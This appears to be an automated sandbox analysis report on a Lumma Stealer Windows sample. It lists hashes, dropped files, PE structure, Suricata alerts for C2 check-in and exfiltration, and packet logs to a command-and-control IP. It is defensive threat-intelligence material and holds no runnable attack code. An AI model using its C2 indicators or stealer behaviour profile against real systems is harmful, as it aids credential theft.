172.67.223.140	1JzM1JflOT.elf	Get hash	malicious	Mirai	Browse	/goform/set_LimitClient_cfg

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	unturnedHack.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.162.84
	xLauncher.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.155.47
	Loader.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.198.61
	Aura.exe	Get hash	malicious	Unknown	Browse	104.21.33.116
	injector V2.5.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.88.250
	injector V2.4.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.44.93
	injector V2.4.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	loader.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.162.84

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.223.140
	xLauncher.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.223.140
	Loader.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.223.140
	Aura.exe	Get hash	malicious	Unknown	Browse	172.67.223.140
	injector V2.5.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.223.140
	injector V2.4.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.223.140
	injector V2.4.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.223.140
	loader.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.223.140
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.223.140

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_f93284ae77ab4eed7e1e6983ffdeb6b8c8d517_2059615a_dc763f9f-12e3-4a02-b6ca-49570e84e160\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9802806809519876
Encrypted:	false
SSDEEP:	192:kIBNwAv6yRkd0BU/fIxaGpezuiFKZ24IO8BB:tN367eBU/iahzuiFKY4IO8X
MD5:	C0A156DCD43B8B44339B72CA402051E6
SHA1:	9FBFFAA77A622A757D411DF38CA00A255989AD67
SHA-256:	DDF11E8E0C12BCDF261A505A727287E26C6872DF7FD2ABBEC1838A8C8C531848
SHA-512:	8BE5C457783E374A2F76F751FE4E06CBE4A19F9FC3565FEF844CFB01E90AD11AA67F25444FE69B25043071ED46E9D978471E13A0138920112A186D01B55161B8
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.6.8.4.3.9.8.9.2.5.4.4.2.7.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.6.8.4.3.9.8.9.9.7.3.1.7.4.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.c.7.6.3.f.9.f.-.1.2.e.3.-.4.a.0.2.-.b.6.c.a.-.4.9.5.7.0.e.8.4.e.1.6.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.f.c.c.9.e.7.5.-.4.1.7.c.-.4.8.4.4.-.8.e.6.e.-.3.f.2.d.1.b.a.9.c.3.a.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.U.l.y.s.s.e.s.T.e.s.s.a.S.a.m.u.e.l...r.Y.P.I.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.d.c.-.0.0.0.1.-.0.0.1.4.-.d.6.2.b.-.4.e.f.5.a.f.3.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.e.f.4.d.e.a.f.3.9.4.d.f.0.5.a.5.3.d.8.7.a.1.8.8.a.e.2.5.3.3.6.0.0.0.0.0.0.0.0.!.0.0.0.0.3.3.3.e.e.9.d.7.f.4.c.6.8.3.d.8.e.0.e.d.0.5.b.d.a.d.f.b.d.2.b.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4C58.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sat Nov 23 13:59:49 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	196644
Entropy (8bit):	3.3621640863548867
Encrypted:	false
SSDEEP:	1536:ErX4MppN4uE2aOkfWqLTg7o0tigCDCDWm/ZVMhwY1:Eb4MV4uEqnqLTg7oVfSj/ZhY
MD5:	41A7D359C296DC078C29AB6D61B91D8E
SHA1:	82C2966531027072D10AE5CFC1E6D4A551B2EE1C
SHA-256:	9D570129A9272A0D58DD3AD3AD91CD30205C0DF0E234B8CE2ADAA2FD8503EAF2
SHA-512:	0F91652402141F0FC07AB4F26CF3E401776413E0BB8A0E32B588A679D92CC3924E84CD20F85C770CFCE08160CE340B8235817C2FE8DE3B9B01204389EC80D7CD
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .........Ag............D...............X.......$...........$....J..........`.......8...........T...........00..............,............ ..............................................................................eJ....... ......GenuineIntel............T.............Ag.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4D53.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8398
Entropy (8bit):	3.701438158704911
Encrypted:	false
SSDEEP:	192:R6l7wVeJ9C4665V6Y9lSU9PigmfZDmYXprQ89bUrsfv8m:R6lXJf6KV6YPSU9PigmfgYXUwfB
MD5:	C2B7F6C1A42CD64E4FA8485286861811
SHA1:	919C070BBE5C30115B3EEEFFCD8E67EAE82C73C4
SHA-256:	CC095056342B35A3393BB8760718C54C224707A14C2E831E593A851B7E99F09B
SHA-512:	728AD0652A0E71BB2CC832192001B00ED787514CF988AF7E19ED46B8F968543D533A2A9E25D4D4BEA12CD64B2D8B52233AAAD338438F8D189A44EE8DF793C6F6
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.3.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4DA2.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4756
Entropy (8bit):	4.5046581231876415
Encrypted:	false
SSDEEP:	48:cvIwWl8zszJg77aI9/0WpW8VYSYm8M4Jf2FVe++q8v7nHyNBrGcd:uIjfNI7pt7VKJwe+KDHgrGcd
MD5:	ADAA035A356FC1F1853D818F2ABACE16
SHA1:	83030F80899E45BE71C32CF2FCA6D24C21621B0F
SHA-256:	3434041C419145AD20234D4745022C4CF29D068F6D7AA302B29526AB5F2F68FA
SHA-512:	BED7AD7534E42E90A654C92017FE838CE65E20D613F2E820AE640EE2288C825A6CFEEDC8F65CF7554CD4FDC23D32ADCEFF5BEFE51D6485A5990CABF8B5B87512
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="600782" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Roaming\gdi32.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	410624
Entropy (8bit):	7.076248937743528
Encrypted:	false
SSDEEP:	12288:TDWjE28LbqpSkloddKQbiqCUr/K/KwVR6uGqxwSVMFIYwXLIMO//jYqVBh5zh2ye:T6jE28LmpSkeddNbiqCUr/K/KwVR6uGZ
MD5:	3535FCD3063A2965F1DD8F9B65CA8355
SHA1:	1F5C89CAF911A08415D55CE1687101B65871B122
SHA-256:	086057602EEC63ED064BD97C1643B20C727AA4A557D16BD26A763716414620FE
SHA-512:	9B623500FFBE25D6DC08C3C90AEB8C123E9FC2841F0962B6FE57CA1D2AB44FB1062352E1D5AB1D506B156C0B25AAF96CA6267A36FD064C97C12DF965BCD66929
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]6...W...W...W...<...W...<..W...<...W...<...W..>....W...W..{W..K"...W..K"...W..K"...W...W...W..."...W..."...W..Rich.W..........PE..L.....Ag...........!.........N.......n.......................................`............@..........................d..X....d..P............................P..l...\]..............................x]..@...............T............................text............................... ..`.rdata...\.......^..................@..@.data........p.......^..............@....reloc..l....P.......4..............@..B................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465934512343268
Encrypted:	false
SSDEEP:	6144:NIXfpi67eLPU9skLmb0b4CWSPKaJG8nAgejZMMhA2gX4WABl0uNPdwBCswSbXR:eXD94CWlLZMM6YFH1+XR
MD5:	1945A0081349AB013841E34653F7E19E
SHA1:	58287BEB77915C45BBD0270D10256EB50F298E71
SHA-256:	6727583F80110FB9E028F1798128C35398716D13E74FB8D8226EB0AE07AD30DF
SHA-512:	EF3A989128436B497EA5A8B6657F3393922F591141B69E4B3601C3561BAB9934EBC429E54C578F179D2AFC0984DE5BAD25A273CAB5CA370354DEB992D3C33774
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.....=.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (354), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	1415
Entropy (8bit):	4.5324638445490235
Encrypted:	false
SSDEEP:	24:7v74NuMMvXIUn2p/kpgw4r22Drrb2nknlusDp:7T4BMff2p8p14nrPKktp
MD5:	A0A7BDF9003524A40DA3745525F33D71
SHA1:	B92126A307BFE0131B3E83A45795D5E4169499DA
SHA-256:	871FB5E2F3DBA881F5446DCFCF7250DE2D8E7844BE8BB3CCD5EDD6910FAC6BDE
SHA-512:	56FA424A0714F4738F6AE5EEB93D1B96F046246B0CD9E67D93C833C5C7DB587A7A8BF9FBCF57CA8500D503C5C81DD68BD6E1E0E2A85E76A8E951E6624CBBC69D
Malicious:	false
Preview:	.Unhandled Exception: System.Resources.MissingManifestResourceException: Could not find any resources appropriate for the specified culture or the neutral culture. Make sure "caspol.resources" was correctly embedded or linked into assembly "UlyssesTessaSamuel" at compile time, or that all the satellite assemblies required are loadable and fully signed... at System.Resources.ManifestBasedResourceGroveler.HandleResourceStreamMissing(String fileName).. at System.Resources.ManifestBasedResourceGroveler.GrovelForResourceSet(CultureInfo culture, Dictionary`2 localResourceSets, Boolean tryParents, Boolean createIfNotExists, StackCrawlMark& stackMark).. at System.Resources.ResourceManager.InternalGetResourceSet(CultureInfo requestedCulture, Boolean createIfNotExists, Boolean tryParents, StackCrawlMark& stackMark).. at System.Resources.ResourceManager.InternalGetResourceSet(CultureInfo culture, Boolean createIfNotExists, Boolean tryParents).. at System.Resources.ResourceManager.GetSt

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.735385458975907
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.96% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	file.exe
File size:	665'088 bytes
MD5:	e7aa83909ace3906ec75144cc33e024c
SHA1:	333ee9d7f4c683d8e0ed05bdadfbd2baade379e3
SHA256:	24443cd457177eeed9c584e5d5ad194303fd94269fdb0d72e0db598215a5c826
SHA512:	508fd7984ea8b9d8c8b2cd3c7c3587941a6ee4627c7cf54fe56db7db75dbff0abdaf0db1b0c46876dc6ad0cc21735bd7a2f0351d5edeb735b2de796beef2ea72
SSDEEP:	12288:bPl8meB2qKGMi2z93d3xmOSv5PGsTgrc8JZJXC+2JW4Q+o95vlcJL1yC5qj1n93Z:7l87B2N+2z93WXuR4WJX
TLSH:	EAE46BDC766072EFC867D472DEA82C64FA5174BB971B4213902716AD9E0C89BDF180F2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ag..............0..................`... ....@.. ....................................@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4aa00a
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6741DBD1 [Sat Nov 23 13:42:41 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [004AA000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x867d4	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa6000	0x650	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa8000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xaa000	0x8
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x86000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
W{2/c	0x2000	0x82378	0x82400	c912d4bf7015ded3f1caaa4148e6b0c7	False	1.0003205224328215	data	7.999654523046763	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.text	0x86000	0x1f080	0x1f200	8bd917f3fa084b717d1e42dad9da72b7	False	0.3297957454819277	data	4.694341381778728	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xa6000	0x650	0x800	4f79bcd03748a48585ea3ccdf1f07d1c	False	0.34912109375	data	3.559434581534301	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xa8000	0xc	0x200	aa2c9aa6be2e298aadf23de4a8183169	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
	0xaa000	0x10	0x200	a861e2dbe40410218ba5bbf2f5899bf3	False	0.044921875	data	0.14263576814887827	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xa60a0	0x3c4	data			0.4221991701244813
RT_MANIFEST	0xa6464	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-23T14:59:50.863041+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49730	172.67.223.140	443	TCP
2024-11-23T14:59:51.810637+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49730	172.67.223.140	443	TCP
2024-11-23T14:59:51.810637+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49730	172.67.223.140	443	TCP
2024-11-23T14:59:53.122240+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49732	172.67.223.140	443	TCP
2024-11-23T14:59:53.825426+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49732	172.67.223.140	443	TCP
2024-11-23T14:59:53.825426+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49732	172.67.223.140	443	TCP
2024-11-23T14:59:55.416705+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49734	172.67.223.140	443	TCP
2024-11-23T14:59:57.908705+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49737	172.67.223.140	443	TCP
2024-11-23T14:59:58.742675+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49737	172.67.223.140	443	TCP
2024-11-23T15:00:00.236881+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49739	172.67.223.140	443	TCP
2024-11-23T15:00:02.720212+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49741	172.67.223.140	443	TCP
2024-11-23T15:00:05.070021+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49742	172.67.223.140	443	TCP
2024-11-23T15:00:09.634403+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49744	172.67.223.140	443	TCP
2024-11-23T15:00:10.352806+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49744	172.67.223.140	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 23, 2024 14:59:49.616070986 CET	49730	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:49.616126060 CET	443	49730	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:49.616194010 CET	49730	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:49.618910074 CET	49730	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:49.618927956 CET	443	49730	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:50.862974882 CET	443	49730	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:50.863040924 CET	49730	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:50.993650913 CET	49730	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:50.993686914 CET	443	49730	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:50.994853020 CET	443	49730	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:51.042572975 CET	49730	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:51.121922970 CET	49730	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:51.121953964 CET	49730	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:51.122203112 CET	443	49730	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:51.810703993 CET	443	49730	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:51.810964108 CET	443	49730	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:51.811018944 CET	49730	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:51.812602043 CET	49730	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:51.812616110 CET	443	49730	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:51.812635899 CET	49730	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:51.812640905 CET	443	49730	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:51.859738111 CET	49732	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:51.859770060 CET	443	49732	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:51.859863043 CET	49732	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:51.860233068 CET	49732	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:51.860246897 CET	443	49732	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:53.122061968 CET	443	49732	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:53.122240067 CET	49732	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:53.123642921 CET	49732	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:53.123656988 CET	443	49732	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:53.123970985 CET	443	49732	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:53.125222921 CET	49732	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:53.125240088 CET	49732	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:53.125291109 CET	443	49732	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:53.825453997 CET	443	49732	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:53.825558901 CET	443	49732	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:53.825603962 CET	49732	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:53.825622082 CET	443	49732	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:53.825711012 CET	443	49732	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:53.825752974 CET	49732	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:53.825761080 CET	443	49732	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:53.825830936 CET	443	49732	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:53.825869083 CET	49732	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:53.825875044 CET	443	49732	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:53.837690115 CET	443	49732	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:53.837729931 CET	49732	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:53.837743998 CET	443	49732	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:53.846138954 CET	443	49732	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:53.846187115 CET	49732	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:53.846199036 CET	443	49732	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:53.899585009 CET	49732	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:53.945135117 CET	443	49732	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:53.993438005 CET	49732	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:53.993464947 CET	443	49732	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:54.026493073 CET	443	49732	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:54.026567936 CET	49732	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:54.026583910 CET	443	49732	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:54.026741028 CET	443	49732	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:54.026802063 CET	49732	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:54.026880026 CET	49732	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:54.026894093 CET	443	49732	172.67.223.140	192.168.2.4
